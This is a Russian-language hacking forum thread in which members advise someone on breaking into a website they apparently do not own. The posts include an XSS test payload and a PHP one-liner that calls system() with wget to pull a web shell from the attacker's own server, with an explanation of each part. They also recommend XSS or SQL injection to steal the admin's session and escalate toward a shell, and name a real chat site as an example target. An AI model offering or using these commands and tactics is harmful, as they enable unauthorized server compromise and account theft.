Ты неправельно понял (или я тебя).
Скрипт ДОЛЖЕН загружать файлы. А если он пропускает какие-то символы, например при постинге сообщения в гостевой, то это тебе ничего не даёт, кроме xss||sql inj

Сморя какой там скрипт Возможно там есть php иньекция и ты не прав тогдаСсылку давай поглядим так на вскидку сказать не чего не могу.

__________________

не думаю что в жаба скрипте буит пхп инъекция)))))))))))))
T-4 а ты введи <script>alert('Hacked by me!');</script>
и наслаждайся=)

__________________

Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze

Ссылку в студию. :]

Если можно вставлять скрипты, попробуй вставь скрипт, чтобы он тебе шелл залил.

NaX[no]r† :: " Если можно вставлять скрипты, попробуй вставь скрипт, чтобы он тебе шелл залил."

=)))))
вопрос читал не)))
Как залить шелл?

вот код на PHP

<? system("cd ../../;wget http://...../shell.php"); ?>

cd ../../ - папка куда залить..
wget - качалка. взависимости еcть ли он на серве..
может быть lynx и т.д.
http://...../shell.php - твой сайт с php-шеллом

А впринципе если *nux знаешь сам напишешь)))

2 [504]
Про возможность выполнения команд на сервере тут ничего не говорилось, а говорилось тут о


Вообщем к сабжу. Как не старайся, но если скрипт пропускает какие-то символы шел никак не залить. (конечно, может быть случай когда поле "отправить коментарий" выпоняет команду на сервере, но такой случай мы не будем рассматривать)
Поэтому топикСтартеру советую рулить в сторону xss || sql inj, дабы заполучить "кусочек" админа, поставить себе этот кусочек и самому стать админом, а у админа больше прав, там уже и до шела не далеко :P

Ты бы ссылку дал мы бы конкретнее посоветовали...
Действительно проще всего сейчас sql inj и какое нить поле создать(если то что ты хакаешь такое позволяет) чат php.sbp.ru например да...И всё...